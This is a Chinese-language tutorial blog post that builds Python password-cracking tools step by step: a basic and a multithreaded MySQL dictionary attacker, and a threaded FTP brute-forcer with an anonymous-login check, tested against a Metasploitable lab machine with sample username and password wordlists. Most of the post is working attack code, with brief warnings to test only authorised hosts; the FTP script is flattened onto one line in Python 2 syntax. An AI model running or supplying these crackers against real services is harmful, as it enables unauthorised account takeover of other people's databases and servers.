上一篇講到了如何用Python開發字典,而當我們手里有了字典
就可以進一步去做爆破的任務了,可以用現成的工具,當然也可以自己寫
接下來我就要一步一步來寫爆破工具!
爆破MySQL:
想要爆破MySQL,目標至少要允許遠程連接(bind-address 不能只綁定 127.0.0.1)。另外只能針對自己有授權測試的系統:MySQL 服務端會記錄每一次失敗登錄,開啟了 connection_control 插件的服務端還可能對連續失敗的登錄逐漸加延遲,使爆破變慢甚至不可行。
我這里沒有開啟遠程連接,只是爆破本地的MySQL
實際上,如果掌握了如何爆破本地MySQL,那么想要遠程爆破MySQL也是很輕松的。但要注意 MySQL 的賬號是按 用戶@來源主機 授權的:同一個密碼在本地能登錄,遠程時若該賬號沒有對應來源的授權(例如只有 'root'@'localhost' 而沒有 'root'@'%'),一樣會返回 Access denied,這種"失敗"並不代表密碼錯誤。
最基本的實現:
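# -*-coding:utf-8 -*-
"""Minimal MySQL dictionary attack against a local server.

Tries every user in ``mysql_username`` with every password in
``mysql_password``.  Only run this against hosts you are authorised to
test: every failed login is logged by the server.
"""
from __future__ import print_function

import pymysql

# ER_ACCESS_DENIED_ERROR: the only error code that actually means
# "wrong credentials".  Anything else means the guess was never evaluated.
ACCESS_DENIED = 1045

mysql_username = ('root', 'test', 'admin', 'user')
mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user')
success = False
host = "127.0.0.1"
port = 3306

for username in mysql_username:
    for password in mysql_password:
        try:
            # Keyword arguments: the positional order of pymysql.connect()
            # has changed between versions, and the original never passed
            # ``port`` at all.  A timeout keeps a dead host from hanging us.
            db = pymysql.connect(host=host, port=port, user=username,
                                 password=password, connect_timeout=5)
        except pymysql.MySQLError as e:
            code = e.args[0] if e.args else None
            if code == ACCESS_DENIED:
                print("用戶名:" + username + " 密碼:" + password + " 破解失敗")
            else:
                # Connection refused, host blocked, timeout...: report it
                # separately, otherwise a dead server looks like a pile of
                # wrong guesses.
                print("用戶名:" + username + " 密碼:" + password + " 連接失敗: " + str(e))
        else:
            success = True
            print("用戶名:" + username + " 密碼:" + password + " 破解成功")
            db.close()  # only the handshake matters; don't keep sessions open
            break       # this user's password is known; move to the next user

if not success:
    print("沒有找到可用的用戶名/密碼組合")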
固定好哪些用戶名和哪些密碼,以及爆破的IP和端口,直接執行即可
進階的MySQL爆破腳本:寫得比較完整,支持多線程(注意並發數要有上限:如果對每一組用戶名/密碼都開一個線程,大字典會瞬間開出成千上萬個連接,目標的 max_connections 會先被耗盡,後面的嘗試全部失敗,和密碼對不對無關)
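# -*-coding:utf-8 -*-
"""
MySQL dictionary attack (MysqlCrack2).

Usage:
python MysqlCrack2.py -H [目標IP] --u [用戶字典] --p [密碼字典] -P [端口]

Every user in the user dictionary is tried with every password in the
password dictionary, at most MAX_THREADS attempts in flight at a time.
Only run this against hosts you are authorised to test: each failed login
is logged by the server, and a server with the connection_control plugin
enabled may delay further attempts from this source.
"""
from __future__ import print_function

import re
import socket
import optparse
import sys
import threading

try:
    import pymysql
except ImportError:
    print("[!] You need to install pymysql module!")
    print("[!] Usage:pip install pymysql")
    sys.exit(1)

# Upper bound on concurrent login attempts.  One thread per user/password
# pair (the naive approach) opens thousands of sockets at once and trips the
# server's max_connections long before any password is found.
MAX_THREADS = 10
# Seconds to wait for the TCP connection / handshake of a single attempt.
CONNECT_TIMEOUT = 5
# ER_ACCESS_DENIED_ERROR: the only error code that means "wrong credentials".
ACCESS_DENIED = 1045

# Credentials of the first successful login (None until/unless found).
result_user = None
result_pass = None
# Every worker thread started by mysql_brute(); the entry point joins them.
threads = []

# Set once a valid pair is found so pending workers return without trying.
# The original called exit() inside the worker, which only ends that one
# thread (SystemExit is swallowed by threading) and leaves the rest running.
_found = threading.Event()
# Serialises writes to result_user / result_pass from worker threads.
_result_lock = threading.Lock()
# Limits workers in flight to MAX_THREADS.
_slots = threading.BoundedSemaphore(MAX_THREADS)


def main():
    """Parse the command line and start the attack.

    Exits with an error when -H is missing or is not a dotted IPv4 address,
    or when either dictionary path is missing.
    :return: None
    """
    print("Welcome to MysqlCrack2")
    print("Author: Xuyiqing Version:1.0")
    parse = optparse.OptionParser(
        'python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')
    parse.add_option('-H', dest="target_host", type="string", help='specify the host')
    parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user')
    parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    parse.add_option('-P', dest='port', type='int', default=3306,
                     help='specify the port (default 3306)')
    (options, args) = parse.parse_args()
    target_host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    port = options.port
    # Anchored pattern: the unanchored original accepted anything that merely
    # *started* with four dotted numbers ("1.2.3.4garbage").
    if target_host is None or not re.match(r'^\d{1,3}(?:\.\d{1,3}){3}$', target_host):
        print("[!] Unknown IP\n")
        sys.exit(1)
    if user_dic is None or pwd_dic is None:
        parse.error('both --u and --p dictionaries are required')
    mysql_brute(target_host, user_dic, pwd_dic, port)


def _load_wordlist(path):
    """Return the lines of *path* with their line endings removed.

    Blank lines are kept on purpose (an empty password is a valid guess).
    '\\r' is stripped as well, so a Windows-edited dictionary does not get a
    carriage return glued onto every candidate.
    :param path: dictionary file path
    :return: list of candidate strings
    :raises IOError/OSError: if the file cannot be read
    """
    with open(path, 'r') as fh:
        return [line.rstrip('\r\n') for line in fh]


def mysql_brute(host, user_dic, pwd_dic, port):
    """Try every user/password pair from the dictionaries against *host*.

    Workers are throttled to MAX_THREADS and no further attempts are queued
    once a valid pair has been found.
    :param host: target IPv4 address
    :param user_dic: path of the username dictionary
    :param pwd_dic: path of the password dictionary
    :param port: MySQL port
    :return: None; started workers are appended to the module-level ``threads``
    """
    print("[*] Target:" + host)
    print("[*] Start cracking")
    try:
        socket.gethostbyname(host)
    except socket.error:
        print('[*] Cannot connect to %s' % host)
        sys.exit(1)
    try:
        userlist = _load_wordlist(user_dic)
        pwdlist = _load_wordlist(pwd_dic)
    except (IOError, OSError):
        print("[!] The path of the dictionary file is incorrect")
        sys.exit(1)
    print("[*] Number of users:" + str(len(userlist)))
    print("[*] Number of passwords:" + str(len(pwdlist)))
    if not userlist or not pwdlist:
        print("[!] Empty dictionary, nothing to try")
        return

    def worker(user, pwd):
        # Always give the slot back, even if mysql_login raises.
        try:
            mysql_login(host, user, pwd, port)
        finally:
            _slots.release()

    for user in userlist:
        for pwd in pwdlist:
            if _found.is_set():
                return  # a valid pair is known; don't queue more attempts
            _slots.acquire()  # blocks while MAX_THREADS workers are running
            t = threading.Thread(target=worker, args=(user, pwd))
            t.start()
            threads.append(t)


def mysql_login(host, username, password, port):
    """Attempt one login and record the pair on success.

    Only ER_ACCESS_DENIED_ERROR (1045) is reported as a wrong guess.  Any
    other error (connection refused, host blocked, timeout) means the guess
    was never evaluated and is printed as an error, so a dead or throttling
    server does not masquerade as a pile of wrong passwords.
    :param host: target host
    :param username: user to try
    :param password: password to try
    :param port: MySQL port
    :return: None; sets result_user/result_pass and the found flag on success
    """
    global result_user, result_pass
    if _found.is_set():
        return
    try:
        db = pymysql.connect(host=host, port=port, user=username,
                             password=password, connect_timeout=CONNECT_TIMEOUT)
    except pymysql.MySQLError as e:
        code = e.args[0] if e.args else None
        if code == ACCESS_DENIED:
            print("[-] Fail! User:" + username + " Password:" + password + "\n")
        else:
            print("[!] Error! User:%s Password:%s -> %s\n" % (username, password, e))
        return
    db.close()  # the handshake is all we need; don't hold a session open
    with _result_lock:
        result_user = username
        result_pass = password
    _found.set()
    print("[+] Success! User:" + username + " Password:" + password + "\n")


if __name__ == '__main__':
    main()
    for thread in threads:
        thread.join()
    if result_user is not None and result_pass is not None:
        print("[+] Result: %s - %s" % (result_user, result_pass))
    else:
        print("[+] Crack Fail")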
FTP破解工具開發:
實際去安裝一些FTP軟件比較困難,我這里就用Metasploitable Linux
啟動后默認開啟FTP服務,我這里的IP是192.168.232.129
Metasploitable Linux的FTP可以匿名登錄,並且已知一個賬號密碼為:msfadmin-msfadmin
# -*-coding:utf-8 -*- import optparse import ftplib import threading import socket def anony_login(host): """ FTP匿名登陸 :param host:主機 :return: None """ try: ftp = ftplib.FTP(host) ftp.connect(host, 21, timeout=10) ftp.login('anonymous', 'test@qq.com') ftp.retrlines('LIST') ftp.quit() print "\n[*]" + str(host) + " FTP Anonymous Login Success" except Exception: print "\n[-]" + str(host) + " FTP Anonymous Login Fail" def ftp_login(host, username, password): """ 嘗試用戶密碼登陸FTP :param host:主機 :param username:用戶名 :param password:密碼 :return:None """ try: print "[-] Trying: " + username + "-" + password + "\n" ftp = ftplib.FTP(host) ftp.connect(host, 21, timeout=10) ftp.login(username, password) ftp.retrlines("LIST") ftp.quit() print "Success! " + username + " - " + password except ftplib.all_errors: pass def brute_force(host, users_file, pwds_file): """ 暴力破解 :param host: 主機 :param users_file:用戶字典 :param pwds_file: 密碼字典 :return: None """ users_f = open(users_file, 'r') pwds_f = open(pwds_file, 'r') for user in users_f.readlines(): pwds_f.seek(0) for password in pwds_f.readlines(): username = user.strip('\n') password = password.strip('\n') t = threading.Thread(target=ftp_login, args=(host, username, password)) t.start() def main(): """ 主函數,處理輸入參數 :return:None """ parser = optparse.OptionParser('usage%prog -H <target host> -u <users dictionary> -p <password dictionary>') parser.add_option('-H', dest='target_host', type='string', help='specify the host') parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user') parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords') (options, args) = parser.parse_args() host = options.target_host user_dic = options.user_dic pwd_dic = options.pwd_dic try: socket.gethostbyname(host) except Exception: print '[*] Cannot Resolve %s Unknown host' % host exit() anony_login(host) brute_force(host, user_dic, pwd_dic) if __name__ == '__main__': main()
使用的話,需要兩個字典:用戶字典和密碼字典,我隨便加入一些東西
username.txt
root
user
admin
msfadmin
manager
password.txt
pwd
password
userpass
msfadmin
manager
123456
實際使用:-H 輸入IP -u 用戶名字典 -p 密碼字典
結果:上邊已經找到匿名登錄可用,還有下圖的msfadmin賬號也登錄成功,說明兩組憑據都有效,破解成功了